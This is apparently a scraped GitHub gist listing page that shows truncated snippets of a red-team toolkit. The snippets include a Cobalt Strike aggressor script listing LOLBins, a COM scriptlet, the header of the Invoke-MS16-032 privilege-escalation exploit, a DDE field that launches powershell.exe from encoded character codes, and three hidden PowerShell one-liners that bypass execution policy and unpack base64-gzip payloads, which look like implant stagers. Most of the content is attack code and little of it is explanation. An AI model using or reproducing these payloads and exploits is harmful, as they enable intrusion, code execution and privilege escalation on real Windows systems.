This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import json | |
from docx import Document | |
A_KEY = "" | |
S_KEY = "" | |
headers = {"X-ApiKeys": "accessKey=; secretKey="} | |
BASE_URL = "https://localhost:8834" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe"); | |
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed", | |
"Syntax: lolbin\n" . | |
"Checks for installed lolbin products"); | |
alias lolbin { | |
$bid = $1; | |
$function = $2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from selenium import webdriver | |
from selenium.webdriver.chrome.options import Options | |
from time import sleep | |
options = Options() | |
#options.add_argument("--headless") | |
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver") | |
user_pass = "" # space seperated |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration remotable="True" version="1.0" desription="desription"> | |
<script language="VBScript"> | |
<![CDATA[ | |
Msgbox("Message") | |
]]> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-MS16-032 { | |
<# | |
.SYNOPSIS | |
PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
operating systems that support PowerShell v2+. Credit for the discovery of | |
the bug and the logic to exploit it go to James Forshaw (@tiraniddo). | |
Targets: | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{SET C "{QUOTE 67 58 92 92 80 114 111 103 114 97 109 115 92 92 77 105 99 114 111 115 111 102 116 92 92 79 102 102 105 99 101 92 92 77 83 87 111 114 100 46 101 120 101 92 92 46 46 92 92 46 46 92 92 46 46 92 92 46 46 92 92 119 105 110 100 111 119 115 92 92 115 121 115 116 101 109 51 50 92 92 119 105 110 100 111 119 115 112 111 119 101 114 115 104 101 108 108 92 92 118 49 46 48 92 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101} "} | |
{DDE {REF C} "a"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANOxYVoCA51W227bOBB991cMvNpaQixCcdvdIECKdZW0DZC2RuVtHgwDoaVxrI1MuiTlCxL/e0mJsuQ4QZvViy1yeObMmQv1Bwz4CsU0Z+DDtUiVQgaTDbzXP8NcMBTwCs7pEuETFcmm1dKWsUo5g4+o/GucxFmKTEHrvgX6cVYxnMEXXPlfJ/9hrMAfbhb4hc5RLyqi7cPCvjIm/0o8xynNMxUKTPROSjOpIRwlctxZDQRfb8gjC73eWKlsW9ua4qIKrXUPxf6ACjp3y/+jSImU3Y6dkM/nlCXd/dVIZjFnjxbP+YplnCbFqmcxBY9RSrACzHmSZ2gI/uN6UJqkU3ArN+DjD2hPUpa0vWKzPFeczVKp5deSn2mXG/1/ToxqEY/vUEkyjBdX1mJ8EpwEhweJVFQo49d6LnZtis4adv04xoXSgGU63JLK9jm6ApcoJB4y3kE3Uv4U83BgHbVfvyG9N6/J8d9vyclf7a6JwzpvlQJKJZDODdsSnOhCi4o1zbLmV+anpGdqpW3T0SAnZRZVYM/wwzjXNb8hUWXqWv9dZ6qLCrvuvTPU6FvwqYTR3plvOOcKQxQqnaYxVfidZmlCTeWFNMsmNL4be94TdEg/VzNTtuZQXz6tjNdIYC1JHVJTs9Fko3A0Hjvm15ReQEgv0M/Dn/fB1sqKLKm23ZHCtSLIYp6Yuj497Ufh5aVnpH5vbNz2tS5QvpLldIhmmGUgcsa0NWghcqmLtA1H4CBbnpo3Zlr8SK/pnOw2Yj5f5KrevGEhX2xEejtT4IYe9ILjt/A5jQWXfKog5GLBRSEggb7xaCwlCNQOl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKqwYVoCA51WXW/bNhR996+48LRaQixCMbohDZBirpJuAbLWqLzlwTAQWrqOtcikRlL+QOL/XlKiLDlO0GV6sUVennvuuR/UTzDiaxTzgoEPtyJVChnMtvBJ/4wLwVDAO7ikK4Q/qEi2nY62jFXKGfyOyr/FWZylyBR0HjugH2cdwwV8wbX/dfYPxgr88TbHL3SJelERbR+W9rUx+UviJc5pkalQYKJ3UppJDeEoUeDeaiT4ZkueWej11kpt29k1FPM6tM4jlPsjKujSrf5PIiVSdj91Qr5cUpb0D1cjmcWcPVu85GuWcZqUq57FFDxGKcEKsORJkaEh+JvrQWWSzsGt3YCP/0J3lrKk65Wb1bnybJZKLb+W/EK73Or/S2JUi3j8gEqScZzfWIvpWXAWHB8kUlGhjF/rudy1Kbpo2Q3jGHOlAat0uBWV3Wt0Ba5QSDxmvIdupfwl5uHIOuqefhiQ01/PyAcyeD/o9k0c1nmnElAqgXRp2FbgRBdaVK5plg2/Kj8VPVMrXZuOFjkps6gGe4UfxoWu+S2JalPX+u87c11U2HcfnbFG34FPJUwOznzDJVcYolDpPI2pwr9plibUVF5Is2xG44ep571AhwwLtTBlaw4N5cvKeK0ENpI0IbU1m8y2CifTqWN+TekFhAwC/Tz9/BjsrKzIknrbnSjcKIIs5omp6/PzYRReX3tG6k/Gxu3e6gLla1lNh2iBWQaiYExbgxaikLpIu3ACDrLVuXljpsVP9JrOyX4j5su8UM3mHQt5vhXp/UKBG3owCE5/gT/TWHDJ5wpCLnIuSgEJDI1HYylBoHaww |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIyuYVoCA51WW2/bNhR+96848LRaQixCDTCgCJBiqZJuAbLWqNzmwTAQmjqOtcikR1K+IPF/HylRF8cJukwvtsjD73znOxfqFxiJDcp5wSGEW5lpjRxmO/hkfsaF5CjhHVzSNcKfVKa7Xs9YMp0JDn+gDm9xxvIMuYbeYw/M420YnMMX3IRfZ38j0xCOdyv8QpdoFjUx9nFpXxuT7wovcU6LXMcSU7OT0VwZCE/LAhurkRTbHXlmYdY7K7Vtb99SXNWh9R6h3B9RSZd+9X+SaJnx+6kXi+WS8nR4uJqonAn+bPFSbHguaFquBg5TCoZKgRNgKdIiR0vwdz+AyiSbg1+7gRD/gf4s42k/KDerc+XZPFNGfiP5uXG5M/+XxKqWCPaAWpExW904i+mH6EN0fJAoTaW2fp3nctel6Lxjd8EYrrQBrNLhV1T2r9GVuEap8JhxA91J+UvM45Fz1O8PLXXnr1dpprREurQEKzxiaisp1wyxllKVkoqRLY++y0CHj1J5UoO9QglZYcp8R5La1Hf+h97c1BEO/UdvbND3EFIFk4Mz33ApNMYodTbPGNX4g+ZZSm2xxTTPZ5Q9TIPgBTrkotALW6n20IVqxAg6aWpVaKPoyjSZ7TROplPP/toCiwg5jczz9OtjtHdKIk/rbX+icasJciZSW71nZxdJfH0dWHU/WRu/f2vKUGxUNQOSBeY5yIJzYw0m9kKZUuzDCXjI12f2jdtGPjFrJg3NBhPLVaHbzTsei9VOZvcLDX4cwGn0/jf4K2NSKDHXEAu5ErLUjMCF9WgtFUg0DtaYkjt+x12lOU2IHUzot |
NewerOlder